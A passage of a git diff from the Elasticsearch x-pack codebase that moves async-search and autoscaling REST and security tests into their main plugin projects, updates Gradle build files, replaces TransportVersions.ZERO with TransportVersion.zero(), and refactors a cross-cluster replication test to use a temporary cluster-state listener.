b/x-pack/plugin/apm-data/src/main/resources/component-templates/metrics-apm@mappings.yaml index 660db3a6b0e2e..3f7b41ea7903c 100644 --- a/x-pack/plugin/apm-data/src/main/resources/component-templates/metrics-apm@mappings.yaml +++ b/x-pack/plugin/apm-data/src/main/resources/component-templates/metrics-apm@mappings.yaml @@ -6,6 +6,8 @@ _meta: template: mappings: properties: + system.process.cpu.start_time: + type: date processor.event: type: constant_keyword value: metric diff --git a/x-pack/plugin/apm-data/src/main/resources/resources.yaml b/x-pack/plugin/apm-data/src/main/resources/resources.yaml index d76fd19f57d0d..70675f1dd10d6 100644 --- a/x-pack/plugin/apm-data/src/main/resources/resources.yaml +++ b/x-pack/plugin/apm-data/src/main/resources/resources.yaml @@ -1,7 +1,7 @@ # "version" holds the version of the templates and ingest pipelines installed # by xpack-plugin apm-data. This must be increased whenever an existing template or # pipeline is changed, in order for it to be updated on Elasticsearch upgrade. -version: 16 +version: 101 component-templates: # Data lifecycle. diff --git a/x-pack/plugin/async-search/build.gradle b/x-pack/plugin/async-search/build.gradle index b013d1df46b97..edb0847575fde 100644 --- a/x-pack/plugin/async-search/build.gradle +++ b/x-pack/plugin/async-search/build.gradle @@ -1,5 +1,10 @@ +import org.elasticsearch.gradle.testclusters.StandaloneRestIntegTestTask + apply plugin: 'elasticsearch.internal-es-plugin' apply plugin: 'elasticsearch.internal-cluster-test' +apply plugin: 'elasticsearch.internal-java-rest-test' +apply plugin: 'elasticsearch.internal-yaml-rest-test' + esplugin { name = 'x-pack-async-search' description = 'A module which allows to track the progress of a search asynchronously.' @@ -10,17 +15,29 @@ base { archivesName = 'x-pack-async-search' } -addQaCheckDependencies(project) - dependencies { compileOnly project(":server") - testImplementation testArtifact(project(':server')) - compileOnly project(path: xpackModule('core')) - testImplementation(testArtifact(project(xpackModule('core')))) - testImplementation project(path: xpackModule('async')) + testImplementation testArtifact(project(':server')) + testImplementation testArtifact(project(xpackModule('core'))) + testImplementation project(xpackModule('async')) internalClusterTestImplementation project(":modules:reindex") + + javaRestTestImplementation testArtifact(project(xpackModule('core'))) + + clusterModules project(":x-pack:test:deprecated-query") + clusterModules project(':modules:analysis-common') + clusterModules project(':test:external-modules:test-error-query') } +restResources { + restApi { + include '_common', 'indices', 'index', 'async_search' + } +} +tasks.withType(StandaloneRestIntegTestTask).configureEach { + def isSnapshot = buildParams.snapshotBuild + it.onlyIf("snapshot build") { isSnapshot } +} diff --git a/x-pack/plugin/async-search/qa/rest/build.gradle b/x-pack/plugin/async-search/qa/rest/build.gradle deleted file mode 100644 index 7363aed336aaf..0000000000000 --- a/x-pack/plugin/async-search/qa/rest/build.gradle +++ /dev/null @@ -1,37 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. 
- */ - -apply plugin: 'elasticsearch.base-internal-es-plugin' -apply plugin: 'elasticsearch.internal-java-rest-test' -apply plugin: 'elasticsearch.legacy-yaml-rest-test' -apply plugin: 'elasticsearch.legacy-yaml-rest-compat-test' - -esplugin { - name = 'x-pack-test-deprecated-query' - description = 'Deprecated query plugin' - classname ='org.elasticsearch.query.DeprecatedQueryPlugin' -} - -dependencies { - clusterPlugins project(xpackModule('async-search')) -} - -restResources { - restApi { - include '_common', 'indices', 'index', 'async_search' - } -} - -testClusters.configureEach { - testDistribution = 'DEFAULT' - setting 'xpack.security.enabled', 'false' -} - -// Test clusters run with security disabled -tasks.named("yamlRestTest") { - buildParams.withFipsEnabledOnly(it) -} diff --git a/x-pack/plugin/async-search/qa/security/build.gradle b/x-pack/plugin/async-search/qa/security/build.gradle deleted file mode 100644 index 79a379c48bc6e..0000000000000 --- a/x-pack/plugin/async-search/qa/security/build.gradle +++ /dev/null @@ -1,11 +0,0 @@ -apply plugin: 'elasticsearch.internal-java-rest-test' - -dependencies { - javaRestTestImplementation(testArtifact(project(xpackModule('core')))) - javaRestTestImplementation project(xpackModule('async-search')) - javaRestTestImplementation project(':test:framework') -} - -tasks.named("javaRestTest").configure { - usesDefaultDistribution("to be triaged") -} diff --git a/x-pack/plugin/async-search/src/internalClusterTest/java/org/elasticsearch/xpack/search/AsyncSearchActionIT.java b/x-pack/plugin/async-search/src/internalClusterTest/java/org/elasticsearch/xpack/search/AsyncSearchActionIT.java index 91d35d79b7c87..e194759979ec4 100644 --- a/x-pack/plugin/async-search/src/internalClusterTest/java/org/elasticsearch/xpack/search/AsyncSearchActionIT.java +++ b/x-pack/plugin/async-search/src/internalClusterTest/java/org/elasticsearch/xpack/search/AsyncSearchActionIT.java @@ -11,7 +11,6 @@ import org.elasticsearch.ExceptionsHelper; import org.elasticsearch.ResourceNotFoundException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.index.IndexRequestBuilder; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.core.TimeValue; @@ -679,7 +678,7 @@ public void testCCSCheckCompatibility() throws Exception { SubmitAsyncSearchRequest request = new SubmitAsyncSearchRequest(new SearchSourceBuilder().query(new DummyQueryBuilder() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersionUtils.getNextVersion(TransportVersions.MINIMUM_CCS_VERSION, true); + return TransportVersionUtils.getNextVersion(TransportVersion.minimumCCSVersion(), true); } }), indexName); diff --git a/x-pack/plugin/async-search/src/internalClusterTest/java/org/elasticsearch/xpack/search/BlockingQueryBuilder.java b/x-pack/plugin/async-search/src/internalClusterTest/java/org/elasticsearch/xpack/search/BlockingQueryBuilder.java index e69e19e4566ea..984cab338e14e 100644 --- a/x-pack/plugin/async-search/src/internalClusterTest/java/org/elasticsearch/xpack/search/BlockingQueryBuilder.java +++ b/x-pack/plugin/async-search/src/internalClusterTest/java/org/elasticsearch/xpack/search/BlockingQueryBuilder.java @@ -12,7 +12,6 @@ import org.apache.lucene.search.ScoreMode; import org.apache.lucene.search.Weight; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import 
org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.lucene.search.Queries; @@ -131,7 +130,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } /** diff --git a/x-pack/plugin/async-search/src/internalClusterTest/java/org/elasticsearch/xpack/search/CrossClusterAsyncSearchIT.java b/x-pack/plugin/async-search/src/internalClusterTest/java/org/elasticsearch/xpack/search/CrossClusterAsyncSearchIT.java index d951b21ba1380..7cc43d43c6ff5 100644 --- a/x-pack/plugin/async-search/src/internalClusterTest/java/org/elasticsearch/xpack/search/CrossClusterAsyncSearchIT.java +++ b/x-pack/plugin/async-search/src/internalClusterTest/java/org/elasticsearch/xpack/search/CrossClusterAsyncSearchIT.java @@ -1778,6 +1778,7 @@ public void testCancellationViaTimeoutWithAllowPartialResultsSetToFalse() throws } SearchListenerPlugin.waitLocalSearchStarted(); + SearchListenerPlugin.waitRemoteSearchStarted(); // ensure tasks are present on both clusters and not cancelled try { diff --git a/x-pack/plugin/async-search/qa/rest/src/javaRestTest/java/org/elasticsearch/qa/AsyncSearchHeadersIT.java b/x-pack/plugin/async-search/src/javaRestTest/java/org/elasticsearch/xpack/search/AsyncSearchHeadersIT.java similarity index 95% rename from x-pack/plugin/async-search/qa/rest/src/javaRestTest/java/org/elasticsearch/qa/AsyncSearchHeadersIT.java rename to x-pack/plugin/async-search/src/javaRestTest/java/org/elasticsearch/xpack/search/AsyncSearchHeadersIT.java index de2bfd4c98ec9..5fe2eabf43aab 100644 --- a/x-pack/plugin/async-search/qa/rest/src/javaRestTest/java/org/elasticsearch/qa/AsyncSearchHeadersIT.java +++ b/x-pack/plugin/async-search/src/javaRestTest/java/org/elasticsearch/xpack/search/AsyncSearchHeadersIT.java @@ -5,7 +5,7 @@ * 2.0. 
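
The SearchListenerPlugin.waitRemoteSearchStarted() call added above keeps the cancellation test from racing the remote cluster. The plugin's internals are not shown in this patch; a plausible latch-based shape, stated purely as an assumption, would be:

    import java.util.concurrent.CountDownLatch;
    import java.util.concurrent.TimeUnit;

    // Assumed sketch of the synchronization behind waitRemoteSearchStarted(); illustrative only.
    final class SearchStartLatches {
        private static final CountDownLatch remoteSearchStarted = new CountDownLatch(1);

        static void onRemoteQueryPhaseStarted() {
            remoteSearchStarted.countDown(); // fired from the remote cluster's query-phase hook
        }

        static void waitRemoteSearchStarted() throws InterruptedException {
            // block the test until the remote search task is definitely running
            if (remoteSearchStarted.await(30, TimeUnit.SECONDS) == false) {
                throw new AssertionError("remote search did not start in time");
            }
        }
    }
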
 */
-package org.elasticsearch.qa;
+package org.elasticsearch.xpack.search;
 import org.elasticsearch.client.Request;
 import org.elasticsearch.client.Response;
@@ -20,7 +20,7 @@ public class AsyncSearchHeadersIT extends ESRestTestCase {
     @ClassRule
-    public static ElasticsearchCluster cluster = ElasticsearchCluster.local().plugin("x-pack-async-search").build();
+    public static ElasticsearchCluster cluster = ElasticsearchCluster.local().module("x-pack-async-search").build();
     @Override
     protected String getTestRestCluster() {
diff --git a/x-pack/plugin/async-search/qa/security/src/javaRestTest/java/org/elasticsearch/xpack/search/AsyncSearchSecurityIT.java b/x-pack/plugin/async-search/src/javaRestTest/java/org/elasticsearch/xpack/search/AsyncSearchSecurityIT.java
similarity index 99%
rename from x-pack/plugin/async-search/qa/security/src/javaRestTest/java/org/elasticsearch/xpack/search/AsyncSearchSecurityIT.java
rename to x-pack/plugin/async-search/src/javaRestTest/java/org/elasticsearch/xpack/search/AsyncSearchSecurityIT.java
index c5736fb440586..453c721674e01 100644
--- a/x-pack/plugin/async-search/qa/security/src/javaRestTest/java/org/elasticsearch/xpack/search/AsyncSearchSecurityIT.java
+++ b/x-pack/plugin/async-search/src/javaRestTest/java/org/elasticsearch/xpack/search/AsyncSearchSecurityIT.java
@@ -26,7 +26,6 @@
 import org.elasticsearch.search.SearchHit;
 import org.elasticsearch.search.SearchResponseUtils;
 import org.elasticsearch.test.cluster.ElasticsearchCluster;
-import org.elasticsearch.test.cluster.local.distribution.DistributionType;
 import org.elasticsearch.test.cluster.util.resource.Resource;
 import org.elasticsearch.test.rest.ESRestTestCase;
 import org.elasticsearch.xcontent.ConstructingObjectParser;
@@ -95,8 +94,9 @@ public class AsyncSearchSecurityIT extends ESRestTestCase {
     @ClassRule
     public static ElasticsearchCluster cluster = ElasticsearchCluster.local()
-        .distribution(DistributionType.DEFAULT)
-        .nodes(2)
+        .module("test-error-query")
+        .module("analysis-common")
+        .module("x-pack-async-search")
         .setting("xpack.license.self_generated.type", "trial")
         .setting("xpack.security.enabled", "true")
         .rolesFile(Resource.fromClasspath("roles.yml"))
diff --git a/x-pack/plugin/async-search/qa/security/src/javaRestTest/resources/roles.yml b/x-pack/plugin/async-search/src/javaRestTest/resources/roles.yml
similarity index 100%
rename from x-pack/plugin/async-search/qa/security/src/javaRestTest/resources/roles.yml
rename to x-pack/plugin/async-search/src/javaRestTest/resources/roles.yml
diff --git a/x-pack/plugin/async-search/src/test/java/org/elasticsearch/xpack/search/CancellingAggregationBuilder.java b/x-pack/plugin/async-search/src/test/java/org/elasticsearch/xpack/search/CancellingAggregationBuilder.java
index c87057a7cd2e1..3e0c949554421 100644
--- a/x-pack/plugin/async-search/src/test/java/org/elasticsearch/xpack/search/CancellingAggregationBuilder.java
+++ b/x-pack/plugin/async-search/src/test/java/org/elasticsearch/xpack/search/CancellingAggregationBuilder.java
@@ -7,7 +7,6 @@
 package org.elasticsearch.xpack.search;
 import org.elasticsearch.TransportVersion;
-import org.elasticsearch.TransportVersions;
 import org.elasticsearch.common.io.stream.StreamInput;
 import org.elasticsearch.common.io.stream.StreamOutput;
 import org.elasticsearch.index.query.QueryBuilders;
@@ -107,6 +106,6 @@ public BucketCardinality bucketCardinality() {
     @Override
     public TransportVersion getMinimalSupportedVersion() {
-        return TransportVersions.ZERO;
+        return TransportVersion.zero();
     }
 }
diff --git a/x-pack/plugin/async-search/qa/rest/src/yamlRestTest/java/org/elasticsearch/qa/AsyncSearchRestIT.java b/x-pack/plugin/async-search/src/yamlRestTest/java/org/elasticsearch/qa/AsyncSearchRestIT.java
similarity index 67%
rename from x-pack/plugin/async-search/qa/rest/src/yamlRestTest/java/org/elasticsearch/qa/AsyncSearchRestIT.java
rename to x-pack/plugin/async-search/src/yamlRestTest/java/org/elasticsearch/qa/AsyncSearchRestIT.java
index cfcf2705c19c6..acc494318726b 100644
--- a/x-pack/plugin/async-search/qa/rest/src/yamlRestTest/java/org/elasticsearch/qa/AsyncSearchRestIT.java
+++ b/x-pack/plugin/async-search/src/yamlRestTest/java/org/elasticsearch/qa/AsyncSearchRestIT.java
@@ -9,11 +9,19 @@
 import com.carrotsearch.randomizedtesting.annotations.ParametersFactory;
+import org.elasticsearch.test.cluster.ElasticsearchCluster;
 import org.elasticsearch.test.rest.yaml.ClientYamlTestCandidate;
 import org.elasticsearch.test.rest.yaml.ESClientYamlSuiteTestCase;
+import org.junit.ClassRule;
 public class AsyncSearchRestIT extends ESClientYamlSuiteTestCase {
+    @ClassRule
+    public static ElasticsearchCluster cluster = ElasticsearchCluster.local()
+        .module("x-pack-test-deprecated-query")
+        .module("x-pack-async-search")
+        .build();
+
     public AsyncSearchRestIT(final ClientYamlTestCandidate testCandidate) {
         super(testCandidate);
     }
@@ -22,4 +30,9 @@ public AsyncSearchRestIT(final ClientYamlTestCandidate testCandidate) {
     public static Iterable parameters() throws Exception {
         return ESClientYamlSuiteTestCase.createParameters();
     }
+
+    @Override
+    protected String getTestRestCluster() {
+        return cluster.getHttpAddresses();
+    }
 }
diff --git a/x-pack/plugin/async-search/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/async-search/10_deprecation.yml b/x-pack/plugin/async-search/src/yamlRestTest/resources/rest-api-spec/test/async-search/10_deprecation.yml
similarity index 100%
rename from x-pack/plugin/async-search/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/async-search/10_deprecation.yml
rename to x-pack/plugin/async-search/src/yamlRestTest/resources/rest-api-spec/test/async-search/10_deprecation.yml
diff --git a/x-pack/plugin/async-search/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/async-search/20_keep_alive.yml b/x-pack/plugin/async-search/src/yamlRestTest/resources/rest-api-spec/test/async-search/20_keep_alive.yml
similarity index 100%
rename from x-pack/plugin/async-search/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/async-search/20_keep_alive.yml
rename to x-pack/plugin/async-search/src/yamlRestTest/resources/rest-api-spec/test/async-search/20_keep_alive.yml
diff --git a/x-pack/plugin/autoscaling/build.gradle b/x-pack/plugin/autoscaling/build.gradle
index 24400a0fc418e..22a43654fd602 100644
--- a/x-pack/plugin/autoscaling/build.gradle
+++ b/x-pack/plugin/autoscaling/build.gradle
@@ -1,5 +1,6 @@
 apply plugin: 'elasticsearch.internal-es-plugin'
 apply plugin: 'elasticsearch.internal-cluster-test'
+apply plugin: 'elasticsearch.internal-yaml-rest-test'
 esplugin {
   name = 'x-pack-autoscaling'
@@ -15,15 +16,21 @@ base {
 dependencies {
   compileOnly project(path: xpackModule('core'))
-  testImplementation(testArtifact(project(xpackModule('core'))))
-  testImplementation project(':modules:data-streams')
-  testImplementation project(path: xpackModule('blob-cache'))
-  testImplementation project(path: xpackModule('searchable-snapshots'))
-  testImplementation project(path: xpackModule('ilm'))
-  testImplementation project(path: xpackModule('slm'))
-  testImplementation project(path: xpackModule('ccr'))
+  testImplementation testArtifact(project(':server'))
+  testImplementation testArtifact(project(xpackModule('core')))
   testImplementation "com.fasterxml.jackson.core:jackson-databind:${versions.jackson}"
+
+  internalClusterTestImplementation project(':modules:data-streams')
+  internalClusterTestImplementation project(xpackModule('blob-cache'))
+  internalClusterTestImplementation project(xpackModule("searchable-snapshots"))
+  internalClusterTestImplementation project(xpackModule('ilm'))
+  internalClusterTestImplementation project(xpackModule('slm'))
+  internalClusterTestImplementation project(xpackModule('ccr'))
 }
-addQaCheckDependencies(project)
+restResources {
+  restApi {
+    include '_common', 'autoscaling'
+  }
+}
diff --git a/x-pack/plugin/autoscaling/qa/rest/build.gradle b/x-pack/plugin/autoscaling/qa/rest/build.gradle
deleted file mode 100644
index 903e76fd986cf..0000000000000
--- a/x-pack/plugin/autoscaling/qa/rest/build.gradle
+++ /dev/null
@@ -1,28 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0; you may not use this file except in compliance with the Elastic License
- * 2.0.
- */
-
-apply plugin: 'elasticsearch.legacy-yaml-rest-test'
-apply plugin: 'elasticsearch.legacy-yaml-rest-compat-test'
-
-dependencies {
-  yamlRestTestImplementation(testArtifact(project(xpackModule('core'))))
-}
-
-restResources {
-  restApi {
-    include '_common', 'autoscaling'
-  }
-}
-
-testClusters.configureEach {
-  testDistribution = 'DEFAULT'
-  setting 'xpack.security.enabled', 'true'
-  setting 'xpack.license.self_generated.type', 'trial'
-  extraConfigFile 'roles.yml', file('autoscaling-roles.yml')
-  user username: 'autoscaling-admin', password: 'autoscaling-admin-password', role: 'superuser'
-  user username: 'autoscaling-user', password: 'autoscaling-user-password', role: 'autoscaling'
-}
diff --git a/x-pack/plugin/autoscaling/src/main/java/org/elasticsearch/xpack/autoscaling/AutoscalingMetadata.java b/x-pack/plugin/autoscaling/src/main/java/org/elasticsearch/xpack/autoscaling/AutoscalingMetadata.java
index 9cb152a7ad401..ecf1c35059960 100644
--- a/x-pack/plugin/autoscaling/src/main/java/org/elasticsearch/xpack/autoscaling/AutoscalingMetadata.java
+++ b/x-pack/plugin/autoscaling/src/main/java/org/elasticsearch/xpack/autoscaling/AutoscalingMetadata.java
@@ -8,7 +8,6 @@
 package org.elasticsearch.xpack.autoscaling;
 import org.elasticsearch.TransportVersion;
-import org.elasticsearch.TransportVersions;
 import org.elasticsearch.cluster.Diff;
 import org.elasticsearch.cluster.DiffableUtils;
 import org.elasticsearch.cluster.NamedDiff;
@@ -114,7 +113,7 @@ public String getWriteableName() {
     @Override
     public TransportVersion getMinimalSupportedVersion() {
-        return TransportVersions.ZERO;
+        return TransportVersion.zero();
     }
     @Override
@@ -173,7 +172,7 @@ static Diff readFrom(final StreamInput in) throws IOE
     @Override
     public TransportVersion getMinimalSupportedVersion() {
-        return TransportVersions.ZERO;
+        return TransportVersion.zero();
     }
 }
 }
diff --git a/x-pack/plugin/autoscaling/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/autoscaling/AutoscalingRestIT.java b/x-pack/plugin/autoscaling/src/yamlRestTest/java/org/elasticsearch/xpack/autoscaling/AutoscalingRestIT.java
similarity index 67%
rename from x-pack/plugin/autoscaling/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/autoscaling/AutoscalingRestIT.java
rename to x-pack/plugin/autoscaling/src/yamlRestTest/java/org/elasticsearch/xpack/autoscaling/AutoscalingRestIT.java
index 89bc24ecc1ed0..15bef71fe1ea5 100644
--- a/x-pack/plugin/autoscaling/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/autoscaling/AutoscalingRestIT.java
+++ b/x-pack/plugin/autoscaling/src/yamlRestTest/java/org/elasticsearch/xpack/autoscaling/AutoscalingRestIT.java
@@ -12,13 +12,24 @@
 import org.elasticsearch.common.settings.SecureString;
 import org.elasticsearch.common.settings.Settings;
 import org.elasticsearch.common.util.concurrent.ThreadContext;
+import org.elasticsearch.test.cluster.ElasticsearchCluster;
+import org.elasticsearch.test.cluster.util.resource.Resource;
 import org.elasticsearch.test.rest.yaml.ClientYamlTestCandidate;
 import org.elasticsearch.test.rest.yaml.ESClientYamlSuiteTestCase;
-
-import static org.elasticsearch.xpack.core.security.authc.support.UsernamePasswordToken.basicAuthHeaderValue;
+import org.junit.ClassRule;
 public class AutoscalingRestIT extends ESClientYamlSuiteTestCase {
+    @ClassRule
+    public static ElasticsearchCluster cluster = ElasticsearchCluster.local()
+        .module("x-pack-autoscaling")
+        .setting("xpack.security.enabled", "true")
+        .setting("xpack.license.self_generated.type", "trial")
+        .rolesFile(Resource.fromClasspath("autoscaling-roles.yml"))
+        .user("autoscaling-admin", "autoscaling-admin-password", "superuser", false)
+        .user("autoscaling-user", "autoscaling-user-password", "autoscaling", false)
+        .build();
+
     public AutoscalingRestIT(final ClientYamlTestCandidate testCandidate) {
         super(testCandidate);
     }
@@ -40,4 +51,8 @@ protected Settings restClientSettings() {
         return Settings.builder().put(ThreadContext.PREFIX + ".Authorization", value).build();
     }
+
+    @Override
+    protected String getTestRestCluster() {
+        return cluster.getHttpAddresses();
+    }
 }
diff --git a/x-pack/plugin/autoscaling/qa/rest/autoscaling-roles.yml b/x-pack/plugin/autoscaling/src/yamlRestTest/resources/autoscaling-roles.yml
similarity index 100%
rename from x-pack/plugin/autoscaling/qa/rest/autoscaling-roles.yml
rename to x-pack/plugin/autoscaling/src/yamlRestTest/resources/autoscaling-roles.yml
diff --git a/x-pack/plugin/autoscaling/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/autoscaling/delete_autoscaling_policy.yml b/x-pack/plugin/autoscaling/src/yamlRestTest/resources/rest-api-spec/test/autoscaling/delete_autoscaling_policy.yml
similarity index 100%
rename from x-pack/plugin/autoscaling/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/autoscaling/delete_autoscaling_policy.yml
rename to x-pack/plugin/autoscaling/src/yamlRestTest/resources/rest-api-spec/test/autoscaling/delete_autoscaling_policy.yml
diff --git a/x-pack/plugin/autoscaling/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/autoscaling/get_autoscaling_capacity.yml b/x-pack/plugin/autoscaling/src/yamlRestTest/resources/rest-api-spec/test/autoscaling/get_autoscaling_capacity.yml
similarity index 100%
rename from x-pack/plugin/autoscaling/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/autoscaling/get_autoscaling_capacity.yml
rename to x-pack/plugin/autoscaling/src/yamlRestTest/resources/rest-api-spec/test/autoscaling/get_autoscaling_capacity.yml
diff --git a/x-pack/plugin/autoscaling/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/autoscaling/get_autoscaling_policy.yml b/x-pack/plugin/autoscaling/src/yamlRestTest/resources/rest-api-spec/test/autoscaling/get_autoscaling_policy.yml
similarity index 100%
rename from x-pack/plugin/autoscaling/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/autoscaling/get_autoscaling_policy.yml
rename to x-pack/plugin/autoscaling/src/yamlRestTest/resources/rest-api-spec/test/autoscaling/get_autoscaling_policy.yml
diff --git a/x-pack/plugin/autoscaling/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/autoscaling/put_autoscaling_policy.yml b/x-pack/plugin/autoscaling/src/yamlRestTest/resources/rest-api-spec/test/autoscaling/put_autoscaling_policy.yml
similarity index 100%
rename from x-pack/plugin/autoscaling/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/autoscaling/put_autoscaling_policy.yml
rename to x-pack/plugin/autoscaling/src/yamlRestTest/resources/rest-api-spec/test/autoscaling/put_autoscaling_policy.yml
diff --git a/x-pack/plugin/build.gradle b/x-pack/plugin/build.gradle
index 34b4f412e849a..2e771efed85d9 100644
--- a/x-pack/plugin/build.gradle
+++ b/x-pack/plugin/build.gradle
@@ -136,6 +136,7 @@ tasks.named("yamlRestCompatTestTransform").configure({ task ->
   task.skipTest("esql/191_lookup_join_on_datastreams/data streams not supported in LOOKUP JOIN", "Added support for aliases in JOINs")
   task.skipTest("esql/190_lookup_join/non-lookup index", "Error message changed")
   task.skipTest("esql/192_lookup_join_on_aliases/alias-pattern-multiple", "Error message changed")
+  task.skipTest("esql/10_basic/Test wrong LIMIT parameter", "Error message changed")
 })
 tasks.named('yamlRestCompatTest').configure {
diff --git a/x-pack/plugin/ccr/src/internalClusterTest/java/org/elasticsearch/xpack/ccr/CcrRepositoryIT.java b/x-pack/plugin/ccr/src/internalClusterTest/java/org/elasticsearch/xpack/ccr/CcrRepositoryIT.java
index 7c47237d35bd5..6c56724a6f20a 100644
--- a/x-pack/plugin/ccr/src/internalClusterTest/java/org/elasticsearch/xpack/ccr/CcrRepositoryIT.java
+++ b/x-pack/plugin/ccr/src/internalClusterTest/java/org/elasticsearch/xpack/ccr/CcrRepositoryIT.java
@@ -21,6 +21,7 @@
 import org.elasticsearch.action.bulk.BulkRequestBuilder;
 import org.elasticsearch.action.get.GetResponse;
 import org.elasticsearch.action.index.IndexRequest;
+import org.elasticsearch.action.support.ActionTestUtils;
 import org.elasticsearch.action.support.ActiveShardCount;
 import org.elasticsearch.action.support.IndicesOptions;
 import org.elasticsearch.action.support.PlainActionFuture;
@@ -51,6 +52,7 @@
 import org.elasticsearch.snapshots.SnapshotId;
 import org.elasticsearch.snapshots.SnapshotShardSizeInfo;
 import org.elasticsearch.snapshots.SnapshotsInfoService;
+import org.elasticsearch.test.ClusterServiceUtils;
 import org.elasticsearch.test.transport.MockTransportService;
 import org.elasticsearch.transport.TransportActionProxy;
 import org.elasticsearch.transport.TransportService;
@@ -655,39 +657,39 @@ public void testCcrRepositoryFailsToFetchSnapshotShardSizes() throws Exception {
         try {
             final SnapshotsInfoService snapshotsInfoService = getFollowerCluster().getCurrentMasterNodeInstance(SnapshotsInfoService.class);
+            final ClusterService clusterService = getFollowerCluster().getCurrentMasterNodeInstance(ClusterService.class);
             final PlainActionFuture waitForAllShardSnapshotSizesFailures = new PlainActionFuture<>();
-            final ClusterStateListener listener = event -> {
-                if (RestoreInProgress.get(event.state()).isEmpty() == false && event.state().routingTable().hasIndex(followerIndex)) {
-                    try {
-                        final IndexRoutingTable indexRoutingTable = event.state().routingTable().index(followerIndex);
-                        // this assertBusy completes because the listener is added after the InternalSnapshotsInfoService
-                        // and ClusterService preserves the order of listeners.
-                        assertBusy(() -> {
-                            List sizes = indexRoutingTable.shardsWithState(ShardRoutingState.UNASSIGNED)
-                                .stream()
-                                .filter(shard -> shard.unassignedInfo().lastAllocationStatus() == AllocationStatus.FETCHING_SHARD_DATA)
-                                .sorted(Comparator.comparingInt(ShardRouting::getId))
-                                .map(shard -> snapshotsInfoService.snapshotShardSizes().getShardSize(shard))
-                                .filter(Objects::nonNull)
-                                .filter(size -> ShardRouting.UNAVAILABLE_EXPECTED_SHARD_SIZE == size)
-                                .collect(Collectors.toList());
-                            assertThat(sizes, hasSize(numberOfShards));
-                        });
-                        waitForAllShardSnapshotSizesFailures.onResponse(null);
-                    } catch (Exception e) {
-                        throw new AssertionError("Failed to retrieve all snapshot shard sizes", e);
-                    }
+            ClusterServiceUtils.addTemporaryStateListener(
+                clusterService,
+                state -> RestoreInProgress.get(state).isEmpty() == false && state.routingTable().hasIndex(followerIndex)
+            ).addListener(ActionTestUtils.assertNoFailureListener(ignore -> {
+                try {
+                    // This listener runs synchronously in the same thread so that clusterService.state() returns the same state
+                    // that satisfied the predicate.
+                    final IndexRoutingTable indexRoutingTable = clusterService.state().routingTable().index(followerIndex);
+                    // this assertBusy completes because the listener is added after the InternalSnapshotsInfoService
+                    // and ClusterService preserves the order of listeners.
+                    assertBusy(() -> {
+                        List sizes = indexRoutingTable.shardsWithState(ShardRoutingState.UNASSIGNED)
+                            .stream()
+                            .filter(shard -> shard.unassignedInfo().lastAllocationStatus() == AllocationStatus.FETCHING_SHARD_DATA)
+                            .sorted(Comparator.comparingInt(ShardRouting::getId))
+                            .map(shard -> snapshotsInfoService.snapshotShardSizes().getShardSize(shard))
+                            .filter(Objects::nonNull)
+                            .filter(size -> ShardRouting.UNAVAILABLE_EXPECTED_SHARD_SIZE == size)
+                            .collect(Collectors.toList());
+                        assertThat(sizes, hasSize(numberOfShards));
+                    });
+                    waitForAllShardSnapshotSizesFailures.onResponse(null);
+                } catch (Exception e) {
+                    throw new AssertionError("Failed to retrieve all snapshot shard sizes", e);
                 }
-            };
-
-            final ClusterService clusterService = getFollowerCluster().getCurrentMasterNodeInstance(ClusterService.class);
-            clusterService.addListener(listener);
+            }));
             logger.debug("--> creating follower index [{}]", followerIndex);
             followerClient().execute(PutFollowAction.INSTANCE, putFollow(leaderIndex, followerIndex, ActiveShardCount.NONE));
             waitForAllShardSnapshotSizesFailures.get(30L, TimeUnit.SECONDS);
-            clusterService.removeListener(listener);
             assertThat(simulatedFailures.get(), equalTo(numberOfShards));
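The CcrRepositoryIT change above swaps a hand-managed ClusterStateListener (add, await, remove) for ClusterServiceUtils.addTemporaryStateListener, which resolves a future the first time a predicate matches and then deregisters itself. The sketch below shows the general shape of such a self-removing observer; StateBus, publish and addTemporaryListener are hypothetical stand-ins for illustration, not the Elasticsearch API.

```java
import java.util.List;
import java.util.concurrent.CompletableFuture;
import java.util.concurrent.CopyOnWriteArrayList;
import java.util.function.Consumer;
import java.util.function.Predicate;

// Hypothetical stand-in for a cluster-state listener registry.
class StateBus<S> {
    private final List<Consumer<S>> listeners = new CopyOnWriteArrayList<>();

    void addListener(Consumer<S> l) { listeners.add(l); }
    void removeListener(Consumer<S> l) { listeners.remove(l); }
    void publish(S state) { listeners.forEach(l -> l.accept(state)); }

    // Registers a listener that completes the returned future the first time
    // the predicate matches, then removes itself from the registry, so the
    // caller never has to pair addListener with removeListener by hand.
    CompletableFuture<S> addTemporaryListener(Predicate<S> predicate) {
        CompletableFuture<S> future = new CompletableFuture<>();
        Consumer<S> listener = new Consumer<>() {
            @Override
            public void accept(S state) {
                // complete() returns true only for the first completion,
                // so the listener is removed exactly once
                if (predicate.test(state) && future.complete(state)) {
                    removeListener(this);
                }
            }
        };
        addListener(listener);
        return future;
    }
}
```

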